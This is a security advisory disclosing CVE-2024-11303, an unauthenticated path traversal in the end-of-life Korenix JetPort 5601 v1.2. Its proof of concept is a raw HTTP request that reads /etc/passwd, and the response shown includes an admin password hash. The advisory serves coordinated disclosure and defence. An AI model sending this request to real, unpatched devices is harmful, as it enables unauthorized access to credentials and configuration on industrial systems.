Korenix JetPort 5601 1.2 Path Traversal
Korenix JetPort 5601 version 1.2 suffers from a path traversal vulnerability.
St. Pölten UAS 20241118-1
-------------------------------------------------------------------------------
                title| Path Traversal
              product| Korenix JetPort 5601
   vulnerable version| 1.2
        fixed version| -
           CVE number| CVE-2024-11303
               impact| High
             homepage| https://www.korenix.com/
                found| 2024-05-24
                   by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,
                     | C. Hierzer, M. Pammer
                     | These vulnerabilities were discovered during research at
                     | St.Pölten UAS, supported and coordinated by CyberDanube.
                     |
                     | https://fhstp.ac.at
                     | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Korenix Technology, a Beijer group company within the Industrial Communication
business area, is a global leading manufacturer providing innovative, market-
oriented, value-focused Industrial Wired and Wireless Networking Solutions.
With decades of experiences in the industry, we have developed various product
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer
base covers different Sales channels, including end-customers, OEMs, system
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions
-------------------------------------------------------------------------------
Korenix JetPort 5601v3 / v1.2

Vulnerability overview
-------------------------------------------------------------------------------
1) Path Traversal (CVE-2024-11303)
A path traversal attack for unauthenticated users is possible. This allows
getting access to the operating system of the device and access information
like configuration files and connections to other hosts or potentially other
sensitive information.

Proof of Concept
-------------------------------------------------------------------------------
1) Path Traversal (CVE-2024-11303)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
-------------------------------------------------------------------------------
GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 10.69.10.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Te: trailers
Connection: keep-alive
-------------------------------------------------------------------------------

Note that this is only possible when an interceptor proxy or a command line
tool is used. A web browser would encode the characters and the path traversal
would not work.

The response to the latter request is shown below:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: thttpd/2.19-MX Jun 2 2022
Content-type: text/plain; charset=iso-8859-1
[...]
Accept-Ranges: bytes
Connection: Keep-Alive
Content-length: 86

root::0:0:root:/root:/bin/false
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution
-------------------------------------------------------------------------------
None. Device is End-of-Life.

Workaround
-------------------------------------------------------------------------------
Limit the access to the device and place it within a segmented network.

Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends Korenix customers to upgrade to another device.

Contact Timeline
-------------------------------------------------------------------------------
2024-09-23: Contacting Beijer Electronics Group via [email protected]: Vendor
            stated, that the device is end-of-life. Contact will ask the
            engineering team if there are any changes.
2024-10-15: Vendor stated, that the advisory can be published. No further
            updates are planned for this device.
2024-11-18: Coordinated disclosure of advisory.

Web: https://www.fhstp.ac.at/
Twitter: https://x.com/fh_stpoelten
Mail: [email protected]

T. Weber / @2024